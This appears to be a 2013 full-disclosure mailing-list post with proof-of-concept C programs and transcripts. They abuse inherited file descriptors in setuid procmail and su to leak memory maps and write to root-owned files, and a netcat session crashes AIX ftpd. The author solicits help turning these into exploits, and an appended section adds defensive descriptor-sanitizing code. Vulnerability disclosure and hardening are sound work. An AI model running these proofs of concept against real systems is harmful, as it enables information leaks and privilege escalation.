Date: Sun, 11 Aug 2013 23:23:21 +0700
From: king cope <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, tinybugsmovingtoupstream@...nel.org
Subject: Super Tiny Linux and AIX bugs

Super Tiny Linux and AIX bugs

discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013

allowed readers are h4x0rz listening to an arbitrary 2pac song,
all others please move along:>

uhh, hit em with a little tiny Linux bug.. my tiny Linux bug..

kcope@...netmars:~$ uname -a;cat /etc/debian_version
Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
7.1
kcope@...netmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

/* Close stdin, then open a file: the lowest free descriptor is 0, and the
 * target inherits that open descriptor across exec. */
int main(void) {
        close(0);
        open("/proc/self/maps", O_RDONLY);
        execl("/usr/bin/procmail", "procmail", "-d", "kcope", (char *)0);
        return 1;
}
kcope@...netmars:~$ gcc test99.c -o test99
kcope@...netmars:~$ >/var/mail/kcope
kcope@...netmars:~$ ./test99
kcope@...netmars:~$ cat /var/mail/kcope
08048000-0805c000 r-xp 00000000 08:01 144347     /usr/bin/procmail
0805c000-0805d000 r--p 00013000 08:01 144347     /usr/bin/procmail
0805d000-0805e000 rw-p 00014000 08:01 144347     /usr/bin/procmail
08c49000-08c6a000 rw-p 00000000 00:00 0          [heap]
b75a8000-b75b2000 r-xp 00000000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b2000-b75b3000 r--p 00009000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b3000-b75b4000 rw-p 0000a000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b4000-b75bd000 r-xp 00000000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bd000-b75be000 r--p 00008000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75be000-b75bf000 rw-p 00009000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bf000-b75d2000 r-xp 00000000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d2000-b75d3000 r--p 00012000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d3000-b75d4000 rw-p 00013000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d4000-b75d6000 rw-p 00000000 00:00 0
b75d6000-b75dc000 r-xp 00000000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dc000-b75dd000 r--p 00005000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dd000-b75de000 rw-p 00006000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75de000-b75e0000 rw-p 00000000 00:00 0
b75e0000-b773c000 r-xp 00000000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773c000-b773d000 ---p 0015c000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773d000-b773f000 r--p 0015c000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773f000-b7740000 rw-p 0015e000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7740000-b7743000 rw-p 00000000 00:00 0
b7743000-b7767000 r-xp 00000000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7767000-b7768000 r--p 00023000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7768000-b7769000 rw-p 00024000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b776e000-b7770000 rw-p 00000000 00:00 0
b7770000-b7771000 r-xp 00000000 00:00 0          [vdso]
b7771000-b778d000 r-xp 00000000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778d000-b778e000 r--p 0001b000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778e000-b778f000 rw-p 0001c000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
bfd62000-bfd83000 rw-p 00000000 00:00 0          [stack]

geez! leaks process maps of setuid root executable. should investigate deeper..

kcope@...netmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

/* Close stderr, then open a file read/write: the lowest free descriptor
 * is 2, and the target inherits that open descriptor across exec. */
int main(void) {
        close(2);
        open("/proc/self/comm", O_RDWR);
        execl("/bin/su", "su", (char *)0);
        return 1;
}
kcope@...netmars:~$ ./test99

kcope@...netmars:~$ ps aux|grep su
root        12  0.0  0.0      0     0 ?        S    14:19   0:00 [sync_supers]
root      6543  0.0  0.4   4240  1128 pts/0    S+   17:58   0:00 su
kcope     6545  0.0  0.3   3568   820 pts/1    S+   17:58   0:00 grep su
You got mail in /var/mail/kcope !!

kcope@...netmars:~$ ls -la /proc/6543/comm
-rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm
kcope@...netmars:~$ cat /proc/6543/comm
Password:

it's writing supplied input to root owned files!
can somebody, hello lists, give me pointers about how to exploit this, if
possible. I know this might be an issue for vuln-dev but I'm a rude boy!

another tiny bug in aix ftpd

kcope@...netmars:~$ nc <ip> 21
220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready.
user ftp
331 Guest login ok, send ident as password.
pass ftp
230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars
230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars
230 Guest login ok, access restrictions apply.
user root
421 ftpd: get_auth_methods() failed: Bad file number
421 root cannot authenticate to server

connection closes and ftpd might coredump..

can somebody please truss the process and tell me what file it wants to open?
this might be exploitable. thanks a lot!

/Kctherootkey
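Both transcripts above (procmail and su on Linux, ftpd on AIX reporting "Bad file number", which is EBADF) come from the same class of problem: a privileged program trusting whatever it inherits on descriptors 0, 1 and 2. The following is an added example, not code from the original post or from any of those programs, of the startup check a setuid or otherwise privileged program can run before it opens anything: a closed standard descriptor is reopened on /dev/null so that the program's first open() cannot land on fd 0, 1 or 2, and a standard descriptor that turns out to be a regular file is reported so the caller can decide to refuse. Function names (`sanitize_fd`, `sanitize_std_fds`, `fd_is_regular_file`) are this example's own.

```c
/* Added example (not part of the original post): standard-descriptor
 * hygiene for a privileged program. Function names are this example's own. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if fd refers to a regular file, 0 if it is anything else
 * (tty, pipe, socket, /dev/null, ...), -1 if fd is not open at all. */
int fd_is_regular_file(int fd)
{
    struct stat st;
    if (fstat(fd, &st) < 0)
        return -1;
    return S_ISREG(st.st_mode) ? 1 : 0;
}

/* If fd is closed, point it at /dev/null so a later open() cannot be handed
 * that number. Returns 1 if it had to be reopened, 0 if it was already open,
 * -1 on failure. */
int sanitize_fd(int fd)
{
    struct stat st;
    if (fstat(fd, &st) == 0)
        return 0;               /* already open: leave it alone */
    if (errno != EBADF)
        return -1;              /* some other error: do not guess */

    int nul = open("/dev/null", fd == STDIN_FILENO ? O_RDONLY : O_WRONLY);
    if (nul < 0)
        return -1;
    if (nul == fd)
        return 1;               /* open() filled the gap directly */
    int rc = (dup2(nul, fd) < 0) ? -1 : 1;
    close(nul);                 /* keep only the copy on the wanted number */
    return rc;
}

/* Apply the check to 0, 1 and 2. Returns how many had to be reopened,
 * or -1 if any of them could not be fixed. */
int sanitize_std_fds(void)
{
    int reopened = 0;
    for (int fd = 0; fd <= 2; fd++) {
        int rc = sanitize_fd(fd);
        if (rc < 0)
            return -1;
        reopened += rc;
    }
    return reopened;
}

int main(void)
{
    /* First thing a privileged program should do: fix closed std fds. */
    if (sanitize_std_fds() < 0)
        return 1;
    /* Second: notice when an inherited std fd is a plain file rather than
     * a terminal, pipe or device, which a setuid program rarely expects. */
    for (int fd = 0; fd <= 2; fd++)
        if (fd_is_regular_file(fd) == 1)
            fprintf(stderr, "warning: fd %d is a regular file\n", fd);
    return 0;
}
```

The two halves address the two cases on the page: the AIX error is the closed-descriptor case, where the program's own open() lands on a standard fd; the Linux transcripts are the open-but-hostile case, where the descriptor is already open on a file of the caller's choosing, so only the second check (inspecting what the descriptor points at) can catch it. Reopening on /dev/null is the same idea glibc applies to setuid binaries at startup, but that covers only the closed case.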
